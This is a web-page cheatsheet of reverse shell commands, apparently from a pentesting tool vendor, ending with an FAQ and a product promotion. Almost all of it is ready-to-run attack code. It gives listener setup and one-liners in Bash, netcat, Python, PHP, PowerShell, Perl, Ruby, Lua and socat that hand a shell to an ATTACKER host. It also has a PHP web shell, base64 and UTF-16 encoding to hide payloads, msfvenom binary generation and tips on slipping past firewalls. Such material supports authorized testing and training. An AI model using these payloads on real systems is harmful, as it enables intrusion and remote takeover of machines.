# Set Up a Listener
Before running any payload, start a listener on your attacker box. Port 443 or 80 blends in with normal traffic and is rarely filtered outbound.
nc -lvnp 443rlwrap nc -lvnp 443msfconsole -q -x "use exploit/multi/handler; set payload linux/x64/shell_reverse_tcp; set LHOST 0.0.0.0; set LPORT 443; run"# Bash Reverse Shells
Bash is on almost every Linux host. The /dev/tcp method needs no extra binary.
bash -i >& /dev/tcp/ATTACKER/443 0>&1bash -c 'bash -i >& /dev/tcp/ATTACKER/443 0>&1'0<&196;exec 196<>/dev/tcp/ATTACKER/443; sh <&196 >&196 2>&196echo -n 'bash -i >& ...' | base64 then echo BASE64 | base64 -d | bash.# Netcat Reverse Shells
If netcat is installed, it's the simplest option. Watch which variant is present — some lack the -e flag.
nc -e /bin/sh ATTACKER 443nc ATTACKER 443 -e /bin/bashrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER 443 >/tmp/fncat ATTACKER 443 -e /bin/bashncat --ssl ATTACKER 443 -e /bin/bash# Python Reverse Shells
Python is present on most Linux systems. Use python3, fall back to python.
python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("ATTACKER",443));[os.dup2(s.fileno(),f) for f in(0,1,2)];pty.spawn("/bin/bash")'python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'# PHP Reverse Shells
Perfect after a file upload on a web server, or via LFI/RCE.
php -r '$sock=fsockopen("ATTACKER",443);exec("/bin/sh -i <&3 >&3 2>&3");'<?php system($_GET['cmd']); ?>php -r '$s=fsockopen("ATTACKER",443);$p=proc_open("/bin/sh -i",array(0=>$s,1=>$s,2=>$s),$pipes);'# PowerShell Reverse Shells (Windows)
PowerShell is the go-to on Windows. The one-liner works on virtually every modern Windows host.
powershell -nop -c "$c=New-Object System.Net.Sockets.TCPClient('ATTACKER',443);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object System.Text.ASCIIEncoding).GetString($b,0,$i);$sb=(iex $d 2>&1|Out-String);$sb2=$sb+'PS '+(pwd).Path+'> ';$sby=([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sby,0,$sby.Length);$s.Flush()}"powershell -nop -w hidden -e BASE64_ENCODED_PAYLOADecho -n 'IEX...' | iconv -t UTF-16LE | base64 -w0.# Perl, Ruby & Others
Fallbacks when bash/python/nc aren't available.
perl -e 'use Socket;$i="ATTACKER";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");'ruby -rsocket -e 'exit if fork;c=TCPSocket.new("ATTACKER",443);loop{c.puts `#{c.gets.chomp}`}'xterm -display ATTACKER:1lua -e "require('socket');require('os');t=socket.tcp();t:connect('ATTACKER',443);os.execute('/bin/sh -i <&3 >&3 2>&3');"# Socat — Fully Stable Shell
Socat gives a fully interactive TTY straight away — no manual stty tricks. Transfer the socat binary if needed.
socat file:`tty`,raw,echo=0 tcp-listen:443socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ATTACKER:443socat OPENSSL-LISTEN:443,cert=cert.pem,verify=0 file:`tty`,raw,echo=0# Upgrade to a Full TTY
A raw netcat shell is fragile — Ctrl+C kills it and vim/ssh/su break. Upgrade it in four steps.
python3 -c 'import pty;pty.spawn("/bin/bash")'export TERM=xtermCtrl+Zstty raw -echo; fgstty -a in your own terminal to read rows/cols, then set them in the shell: stty rows 38 cols 116 so full-screen apps render correctly.# msfvenom Payloads
Generate standalone reverse shell binaries and scripts when you need a file to drop.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=443 -f exe -o rev.exemsfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=443 -f elf -o rev.elfmsfvenom -p php/reverse_php LHOST=IP LPORT=443 -f raw -o rev.phpmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=443 -f exe -o met.exe❓ Reverse Shell FAQ
A shell session where the target connects back to the attacker's listener instead of the attacker connecting in. This bypasses inbound firewalls since outbound traffic is usually allowed. Start a listener (nc -lvnp 443) and run a payload on the target.
Reverse: the target connects out to you (bypasses inbound firewalls). Bind: the target opens a port and you connect in (needs that port reachable). Reverse shells are preferred because outbound is rarely blocked.
nc -lvnp 443 is the classic. Use rlwrap nc -lvnp 443 for arrow-key history, or a Metasploit multi/handler with a matching payload.
A raw netcat shell has no TTY — Ctrl+C kills it and vim/ssh/su freeze. Upgrade: python3 -c 'import pty;pty.spawn("/bin/bash")', then Ctrl+Z, then stty raw -echo; fg, then export TERM=xterm.
Match what's installed. Linux: bash and python are almost always there. Windows: PowerShell. If netcat has -e, that's simplest. Keep a socat option for a fully stable, encrypted shell.
Socat is the cleanest: socat file:`tty`,raw,echo=0 tcp-listen:443 on your host and socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ATTACKER:443 on the target.
msfvenom -p <payload> LHOST=IP LPORT=443 -f <format> -o out. E.g. windows/x64/shell_reverse_tcp ... -f exe. Catch with a matching nc -lvnp 443 or multi/handler.
They are legitimate for authorized pentests, CTFs and your own labs. Using them against systems you don't own or lack written permission to test is illegal. Always stay in scope.
📚 Related Resources
- Linux Privilege Escalation Cheatsheet — Got a shell? Now escalate to root — 80+ techniques
- Windows Privilege Escalation Cheatsheet — From your PowerShell shell to NT AUTHORITY\SYSTEM
- OSCP Cheatsheet — Getting a stable shell is a core OSCP skill
- Metasploit Cheatsheet — Catch your reverse shell with a multi/handler and upgrade to Meterpreter
- Pentesting Glossary — TTY, payload, listener, LFI and 60+ key terms defined
Turn your access into a professional PDF report. AI auto-fills CVE, CVSS and severity.
Want all 12,020+ commands?
This reverse shell cheatsheet is one branch of the map. Pentest Mindmap organizes 12,020+ commands across 34 categories — recon to post-exploitation — with instant search and one-click copy.
Start free →